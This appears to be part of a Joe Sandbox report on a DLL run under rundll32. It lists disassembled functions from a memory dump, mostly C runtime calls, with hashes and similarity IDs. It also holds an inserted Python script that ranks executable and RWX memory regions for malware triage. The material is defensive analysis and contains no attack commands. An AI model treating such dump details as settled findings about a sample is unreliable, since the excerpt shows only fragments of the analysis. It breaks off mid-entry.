                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6fca37d7889c3a260593bbad1d581110a8fd693c346d4737e753c4759e39e5a5
                    • Instruction ID: ff2a4e933308082384f323ee8e5b5f41b7192e1a6095169e81ac85e9c3d992c6
                    • Opcode Fuzzy Hash: 6fca37d7889c3a260593bbad1d581110a8fd693c346d4737e753c4759e39e5a5
                    • Instruction Fuzzy Hash: E0E08C32915268EBCB10CB88C900D8EB3FCEB44E64B21409AB502E3101C370EE40C7C0
                    Uniqueness

                    Uniqueness Score: -1.00%
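The Memory Dump Source entries above identify each dump only by its .sdmp file name. The Python below is added here as a triage aid; it is not part of the Joe Sandbox report or its tooling. It parses those names and flags executable regions worth opening first. It assumes, as an interpretation the page does not document, that the dotted fields are process id, analysis stage, dump id, region base, page protection and allocation type in winnt.h encoding: pid 0x17 = 23 and stage 2 agree with the snapshot names hcaresult_23_2_*, the protection values 0x02 / 0x04 / 0x20 on the associated 6FFA0000 image match a header, data and code section layout, and 0x01000000 equals MEM_IMAGE. The sample lines are constructed from the Source File bullets on this page; the RWX (0x40) region at 7004A000 with no PE header at its base is the kind of region unpacked or injected code is usually recovered from.

```python
import re
from dataclasses import dataclass

# winnt.h memory-protection and allocation-type constants.  ASSUMPTION: the
# fifth and seventh dotted fields of a Joe Sandbox .sdmp name carry these
# values; the report page does not document its naming scheme.
PAGE_READONLY          = 0x02
PAGE_READWRITE         = 0x04
PAGE_EXECUTE_READ      = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE              = 0x1000000

EXECUTABLE = {PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE}
WRITABLE   = {PAGE_READWRITE, PAGE_EXECUTE_READWRITE}

# Constructed sample: "Source File" bullets copied from this report's
# Memory Dump Source blocks (the last line repeats the third on purpose,
# because the report cites the same dump once per function).
SAMPLE_REPORT = """\
• Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
• Source File: 00000017.00000002.882581732.000000007004A000.00000040.00000001.01000000.0000000C.sdmp, Offset: 7004A000, based on PE: false
• Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
• Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
"""

# One "Source File:" bullet; the two unnamed fields are not interpreted.
_SDMP_RE = re.compile(
    r"Source File:\s*"
    r"(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\."
    r"(?P<mem_type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp,\s*"
    r"Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpSource:
    pid: int
    stage: int
    base: int
    protect: int
    mem_type: int
    offset: int        # image base when a PE header was found, else the region base
    based_on_pe: bool


def parse_dump_sources(report_text):
    """Return the distinct DumpSource records cited in a block of report text."""
    seen, records = set(), []
    for m in _SDMP_RE.finditer(report_text):
        rec = DumpSource(
            pid=int(m["pid"], 16),
            stage=int(m["stage"], 16),
            base=int(m["base"], 16),
            protect=int(m["protect"], 16),
            mem_type=int(m["mem_type"], 16),
            offset=int(m["offset"], 16),
            based_on_pe=m["pe"].lower() == "true",
        )
        if rec not in seen:
            seen.add(rec)
            records.append(rec)
    return records


def protect_name(protect):
    """Human-readable protection, e.g. 0x40 -> 'RWX'."""
    names = {PAGE_READONLY: "R--", PAGE_READWRITE: "RW-",
             PAGE_EXECUTE_READ: "R-X", PAGE_EXECUTE_READWRITE: "RWX"}
    return names.get(protect, f"0x{protect:02X}")


def triage(sources):
    """Executable regions worth a closer look as (severity, base, reason),
    most suspicious first.  Writable code outranks code without a PE header."""
    findings = []
    for s in sources:
        if s.protect not in EXECUTABLE:
            continue
        if s.protect in WRITABLE:
            findings.append((2, s.base,
                             "RWX: writable code, where unpacked or injected payloads usually live"))
        elif not s.based_on_pe:
            findings.append((1, s.base,
                             "R-X with no PE header at the dump base: code outside a recognised image header"))
    return sorted(findings, key=lambda f: (-f[0], f[1]))


if __name__ == "__main__":
    for src in parse_dump_sources(SAMPLE_REPORT):
        print(f"pid {src.pid} stage {src.stage} base 0x{src.base:08X} "
              f"{protect_name(src.protect)} image={src.mem_type == MEM_IMAGE} pe={src.based_on_pe}")
    for severity, base, reason in triage(parse_dump_sources(SAMPLE_REPORT)):
        print(f"[{severity}] 0x{base:08X}: {reason}")
```

Run it against the text of a whole report rather than the sample and the ordering tells you which dumps to load into a disassembler first: RWX regions, then executable regions that are not anchored on a PE header.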

                    APIs
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF179
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF188
                    • char_traits.LIBCPMTD ref: 6FFFF194
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1B0
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1C5
                    • char_traits.LIBCPMTD ref: 6FFFF1D7
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1E6
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF1F5
                    • char_traits.LIBCPMTD ref: 6FFFF201
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF21D
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF22C
                    • char_traits.LIBCPMTD ref: 6FFFF238
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF247
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF25C
                    • char_traits.LIBCPMTD ref: 6FFFF26E
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                    • String ID:
                    • API String ID: 1941806930-0
                    • Opcode ID: d3a7509486b76081470c7a518e2d4ac50561db21e1814540b1f1cbe54e7e4f5c
                    • Instruction ID: 91f29b3126bf8f0ec511e09867febdb1999827a47b67f2d103a68876175ddc61
                    • Opcode Fuzzy Hash: d3a7509486b76081470c7a518e2d4ac50561db21e1814540b1f1cbe54e7e4f5c
                    • Instruction Fuzzy Hash: E8C1067460110EEFCB04DF98C9E1C9E7776AF88348B548658E9059B2B4DF30AE66DBD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: a9824216ead9bd280c27b5276f1881a77e5a4c20b47eb11c04cb6e4761f6d705
                    • Instruction ID: 272d202b8f988d8038302b157d84eb41cce39a5a0ea54de91ceb8be01c934ed3
                    • Opcode Fuzzy Hash: a9824216ead9bd280c27b5276f1881a77e5a4c20b47eb11c04cb6e4761f6d705
                    • Instruction Fuzzy Hash: 2AD18071D002059FEB11CFB9C885BEEBBF6BF08720F14416DE49AA7282D779A945CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 700106C0
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 700106D2
                    • _free.LIBCMT ref: 700106E4
                    • _free.LIBCMT ref: 700106F6
                    • _free.LIBCMT ref: 70010708
                    • _free.LIBCMT ref: 7001071A
                    • _free.LIBCMT ref: 7001072C
                    • _free.LIBCMT ref: 7001073E
                    • _free.LIBCMT ref: 70010750
                    • _free.LIBCMT ref: 70010762
                    • _free.LIBCMT ref: 70010774
                    • _free.LIBCMT ref: 70010786
                    • _free.LIBCMT ref: 70010798
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: f97cc94d2ea3b08f866f1e80c0d6ec52c0edfb6720023a01d931fff0eb92fdf2
                    • Instruction ID: 5be9ad8ea7f0c4f679f7da0f494f30bb4a7686d66051d5ad374a82ff352607b7
                    • Opcode Fuzzy Hash: f97cc94d2ea3b08f866f1e80c0d6ec52c0edfb6720023a01d931fff0eb92fdf2
                    • Instruction Fuzzy Hash: 3621CD729086019FE624DB69E98DD1E77FABB16B307714809F04ED7661CB74F8C08A29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 700101A1
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106C0
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106D2
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106E4
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 700106F6
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010708
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 7001071A
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 7001072C
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 7001073E
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010750
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010762
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010774
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010786
                      • Part of subcall function 700106A3: _free.LIBCMT ref: 70010798
                    • _free.LIBCMT ref: 700101C3
                    • _free.LIBCMT ref: 700101D8
                    • _free.LIBCMT ref: 700101E3
                    • _free.LIBCMT ref: 70010205
                    • _free.LIBCMT ref: 70010218
                    • _free.LIBCMT ref: 70010226
                    • _free.LIBCMT ref: 70010231
                    • _free.LIBCMT ref: 70010269
                    • _free.LIBCMT ref: 70010270
                    • _free.LIBCMT ref: 7001028D
                    • _free.LIBCMT ref: 700102A5
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: c47b5f8f1398932e329f591e448691dbf4b7ebacda39726e9c4bb4b9a9c59c11
                    • Instruction ID: e899c0f5af7b323e78e8686e828945d8871133d87de415e42b4181add55065cd
                    • Opcode Fuzzy Hash: c47b5f8f1398932e329f591e448691dbf4b7ebacda39726e9c4bb4b9a9c59c11
                    • Instruction Fuzzy Hash: A2314E31A04202AFEB219B75D949B5E77FABF00B74F218429F49AD7151DBB8BD80CB11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 70009598
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 700095A4
                    • _free.LIBCMT ref: 700095AF
                    • _free.LIBCMT ref: 700095BA
                    • _free.LIBCMT ref: 700095C5
                    • _free.LIBCMT ref: 700095D0
                    • _free.LIBCMT ref: 700095DB
                    • _free.LIBCMT ref: 700095E6
                    • _free.LIBCMT ref: 700095F1
                    • _free.LIBCMT ref: 700095FF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 05c1a3bbcdd2f1419836cacbb61ec53f82d82ae4fff0d2ac9c6276039de2dbe6
                    • Instruction ID: 97089b3469df367ce5ff4be50e93fad7a256b0b6bd4046ef705e6f1e16815efe
                    • Opcode Fuzzy Hash: 05c1a3bbcdd2f1419836cacbb61ec53f82d82ae4fff0d2ac9c6276039de2dbe6
                    • Instruction Fuzzy Hash: 5421F876904108BFDB11DFA4C985DEE7FB9BF08620F0141A6F5099B122EB35EA44CF81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 30f2ca76489c21f221c9ebf10f39c900f917439cb00bee90209806db1434aaa1
                    • Instruction ID: 6b9503c9cb6399f6a15e0d4d227aca03bdc491feb121b3ee175313bc9ae0cbb8
                    • Opcode Fuzzy Hash: 30f2ca76489c21f221c9ebf10f39c900f917439cb00bee90209806db1434aaa1
                    • Instruction Fuzzy Hash: E561D5729046069FE721CF78D841B9E77F9FB45B30F204559E989DB281EBB0BD408B51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 6FFFA6C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFA6D1
                      • Part of subcall function 6FFFA6C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFA6DE
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF434
                      • Part of subcall function 6FFFF0C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF179
                      • Part of subcall function 6FFFF0C0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF188
                      • Part of subcall function 6FFFF0C0: char_traits.LIBCPMTD ref: 6FFFF194
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF4BA
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF4CF
                    • char_traits.LIBCPMTD ref: 6FFFF4E1
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF52C
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF541
                    • char_traits.LIBCPMTD ref: 6FFFF553
                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FFFF566
                    • char_traits.LIBCPMTD ref: 6FFFF572
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Base::Concurrency::details::ContextIdentityQueueWork$char_traits
                    • String ID:
                    • API String ID: 1941806930-0
                    • Opcode ID: 0f016ba469a117847c5979690273d21c227afda46c1714b2a82e69eadf211ba4
                    • Instruction ID: 69c695e9435f3c5dfeb203d8bcc68b60fed77fa0f39ff9a332bc4254af64a895
                    • Opcode Fuzzy Hash: 0f016ba469a117847c5979690273d21c227afda46c1714b2a82e69eadf211ba4
                    • Instruction Fuzzy Hash: BB510D75A0110EEFCB04DF98D9D0D9E73B6AF88308F548658E9159B3A4DB30AF16DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 700096C6: GetLastError.KERNEL32(00000000,?,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 700096CB
                      • Part of subcall function 700096C6: SetLastError.KERNEL32(00000000,700471A0,000000FF,?,70006E7D,?,?,7000053E,?,?,70045B10,?), ref: 70009769
                    • _memcmp.LIBVCRUNTIME ref: 7000B845
                    • _free.LIBCMT ref: 7000B8B9
                    • _free.LIBCMT ref: 7000B8D2
                    • _free.LIBCMT ref: 7000B910
                    • _free.LIBCMT ref: 7000B919
                    • _free.LIBCMT ref: 7000B925
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorLast$_memcmp
                    • String ID: C
                    • API String ID: 4275183328-1037565863
                    • Opcode ID: 1fd14246e37770a957d950b4cbe6281ae3dea5a62c8ba3575761535fe8edd5a0
                    • Instruction ID: 2ad2be3f93130312bdd8a729acb6c1c991dc571e711b98b1f773fc178a8faa1a
                    • Opcode Fuzzy Hash: 1fd14246e37770a957d950b4cbe6281ae3dea5a62c8ba3575761535fe8edd5a0
                    • Instruction Fuzzy Hash: 33B13C75A012199FEB25DF18C884B9DB7B5FF48724F1085AAE90AA7350DB71AE90CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5af925e0bb4255ed1d0cea57c4d73a074bf57a85f871645eae71e6705c25ac03
                    • Instruction ID: c52c509d80674c6e3c924945564b214af6c1e635c35590b3a05b1275ad833291
                    • Opcode Fuzzy Hash: 5af925e0bb4255ed1d0cea57c4d73a074bf57a85f871645eae71e6705c25ac03
                    • Instruction Fuzzy Hash: 5CC1D6B4D01209DFDB14CF98C990BAEBBB1FF49314F208269E419AB391DB35A946CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6FFF231A
                    • int.LIBCPMTD ref: 6FFF2333
                      • Part of subcall function 6FFF5120: std::_Lockit::_Lockit.LIBCPMT ref: 6FFF5136
                      • Part of subcall function 6FFF5120: std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF5160
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF23CB
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                    • String ID:
                    • API String ID: 593203224-0
                    • Opcode ID: b7142ffed3046ac49ca1ab9a65a225dc485f7068299ecebea8bd712ae7f55b31
                    • Instruction ID: 8c83eacf671e5c6d7c5081f76e1f082217f26537f4fe45b922b6b7492d0d99c4
                    • Opcode Fuzzy Hash: b7142ffed3046ac49ca1ab9a65a225dc485f7068299ecebea8bd712ae7f55b31
                    • Instruction Fuzzy Hash: F7314BB1D0524ADFCB04DFA4C981AEEB7B5FF48720F104629E825B73A0DB356A01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6FFF221A
                    • int.LIBCPMTD ref: 6FFF2233
                      • Part of subcall function 6FFF5120: std::_Lockit::_Lockit.LIBCPMT ref: 6FFF5136
                      • Part of subcall function 6FFF5120: std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF5160
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6FFF22CB
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                    • String ID:
                    • API String ID: 593203224-0
                    • Opcode ID: a0f5f5d9050b5342a8b420c6bedff8e8e3daeb78f75879064a4a32afb0882b47
                    • Instruction ID: 7302dbb918da0a733c11fa83775117b8244f691ae43c566701b697452c5f2d31
                    • Opcode Fuzzy Hash: a0f5f5d9050b5342a8b420c6bedff8e8e3daeb78f75879064a4a32afb0882b47
                    • Instruction Fuzzy Hash: BF315CB1D05249DFDB04DFA4C980BEEB7B0FF49720F104629E825A73A0DB716A01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 70010DD0: _free.LIBCMT ref: 70010DF5
                    • _free.LIBCMT ref: 700110D2
                      • Part of subcall function 700074E6: HeapFree.KERNEL32(00000000,00000000,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?), ref: 700074FC
                      • Part of subcall function 700074E6: GetLastError.KERNEL32(?,?,70010DFA,?,00000000,?,?,?,7001109D,?,00000007,?,?,700102FF,?,?), ref: 7000750E
                    • _free.LIBCMT ref: 700110DD
                    • _free.LIBCMT ref: 700110E8
                    • _free.LIBCMT ref: 7001113C
                    • _free.LIBCMT ref: 70011147
                    • _free.LIBCMT ref: 70011152
                    • _free.LIBCMT ref: 7001115D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: db93a60c520cae334d79caf43acf8ce84a6796fdc350f4b236b0c628b9c7a178
                    • Instruction ID: 30abfd799bc072c3d797e465062370f173c556e0cc3cf4cf1ef16ba840afb9c1
                    • Opcode Fuzzy Hash: db93a60c520cae334d79caf43acf8ce84a6796fdc350f4b236b0c628b9c7a178
                    • Instruction Fuzzy Hash: 82112C71940B04AEE530ABF0DC0AFDF7B9CBF40B60F404815B29DA6092DBA9B5448752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLastError.KERNEL32(?,?,70005ED4,700019C5,700015F1), ref: 70005FF8
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 70006006
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7000601F
                    • SetLastError.KERNEL32(00000000,?,70005ED4,700019C5,700015F1), ref: 70006071
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 4bb942f0e4f706afa6a167da4a01b7911a6bdcf1456eb8d522460cc55fd52a5d
                    • Instruction ID: d9ce064682aae80c8d8687f109e83c2726cad6850be2c3023e4d13325c692f2b
                    • Opcode Fuzzy Hash: 4bb942f0e4f706afa6a167da4a01b7911a6bdcf1456eb8d522460cc55fd52a5d
                    • Instruction Fuzzy Hash: 0801D43B7892126EF326677AAC8962F3AABEF02E787304229F519414F0EF116C409154
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 7001390D
                    • __fassign.LIBCMT ref: 70013AEC
                    • __fassign.LIBCMT ref: 70013B09
                    • WriteFile.KERNEL32(?,7000FF5E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 70013B51
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 70013B91
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 70013C3D
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 34b49f3e9250847c51f5328c8971d952cfb5e9f1487204c6efe049c795159145
                    • Instruction ID: 29693fd353e1a6a5e3fef727561aa1d161c5bbaba3a35f73ad94fd0d42c7fe87
                    • Opcode Fuzzy Hash: 34b49f3e9250847c51f5328c8971d952cfb5e9f1487204c6efe049c795159145
                    • Instruction Fuzzy Hash: F2D1BD71D042599FDF15CFA8C9809EDBBB5BF49720F24016DE856BB242E730AD86CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free_strpbrk
                    • String ID: *?
                    • API String ID: 3300345361-2564092906
                    • Opcode ID: e1a1aa32129ba429b7c700d8d5b6ac68a903fb23adde7ba9c70e32a411e22ede
                    • Instruction ID: fd464556ac28505ddd56616ac2565a2a93ed8cc5e0dd226586c6280715aaa50e
                    • Opcode Fuzzy Hash: e1a1aa32129ba429b7c700d8d5b6ac68a903fb23adde7ba9c70e32a411e22ede
                    • Instruction Fuzzy Hash: C2615DB5E0025D9FEB15CFA8C8815EDFBF6EF48624B25816AE845F7300D735AE418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • C:\Windows\SysWOW64\rundll32.exe, xrefs: 7000F2D5
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                    • API String ID: 0-2837366778
                    • Opcode ID: f28fa3252abee74e7171f4a8ec98e77d48e4efede06f78b84f58b554be6ebc6a
                    • Instruction ID: 0f9b5780119d247b4562d02999d90aa095166b58f6ecd995f8f15535d4361e28
                    • Opcode Fuzzy Hash: f28fa3252abee74e7171f4a8ec98e77d48e4efede06f78b84f58b554be6ebc6a
                    • Instruction Fuzzy Hash: D321FFB1608209BFF7119FA18CC0D6F77AEAF40A787118525F919D7941EB70EE00A7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: 9dda47f9c9e10c0aadbecf73c3a40d66fa64f023f09dc5ae81a328d2951244d1
                    • Instruction ID: 28ee166964a5fee82ce145c2b75944edfb088f1cf2efe276690ebfa966d1a6f6
                    • Opcode Fuzzy Hash: 9dda47f9c9e10c0aadbecf73c3a40d66fa64f023f09dc5ae81a328d2951244d1
                    • Instruction Fuzzy Hash: 4A518132A00605AFEB22DF69CD41BAE77F6EF58B34F10456DE90AD7250E735EA018B40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _free.LIBCMT ref: 700088D1
                    • _free.LIBCMT ref: 700088F1
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 70008952
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 70008964
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 70008971
                    Memory Dump Source
